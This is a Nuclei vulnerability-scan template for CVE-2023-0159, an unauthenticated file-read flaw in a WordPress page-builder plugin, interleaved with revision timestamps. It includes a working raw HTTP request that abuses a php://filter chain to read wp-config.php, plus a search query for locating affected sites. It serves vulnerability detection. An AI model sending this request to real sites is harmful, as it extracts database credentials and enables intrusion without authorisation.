2024-03-31 07:25:33 +00:00
id : CVE-2023-0159
info :
name : Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author : c4sper0
severity : high
description : |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
2024-03-31 17:45:32 +00:00
remediation : Fixed in 1.9.1
2024-04-08 11:30:07 +00:00
reference : |-
2024-03-31 07:25:33 +00:00
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
- https://github.com/im-hanzou/EVCer
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/xu-xiang/awesome-security-vul-llm
2024-03-31 17:45:32 +00:00
- https://wordpress.org/plugins/extensive-vc-addon/
2024-03-31 07:25:33 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-0159
2024-04-08 11:30:07 +00:00
epss-score : 0.00687
epss-percentile : 0.79734
2024-03-31 07:25:33 +00:00
cpe : cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
metadata :
2024-04-08 11:30:07 +00:00
max-request : 1
2024-03-31 07:25:33 +00:00
vendor : wprealize
2024-04-08 11:30:07 +00:00
product : "extensive_vc_addons_for_wpbakery_page_builder"
2024-03-31 07:25:33 +00:00
framework : wordpress
publicwww-query : "/wp-content/plugins/extensive-vc-addon/"
2024-04-08 11:30:07 +00:00
tags : cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize
2024-03-31 07:25:33 +00:00
http :
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition : and
matchers :
- type : word
part : body
words :
- '{"status":"success","message":"Items are loaded","data":'
- type : status
status :
2024-03-31 17:45:32 +00:00
- 200
2024-03-31 17:50:52 +00:00
# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950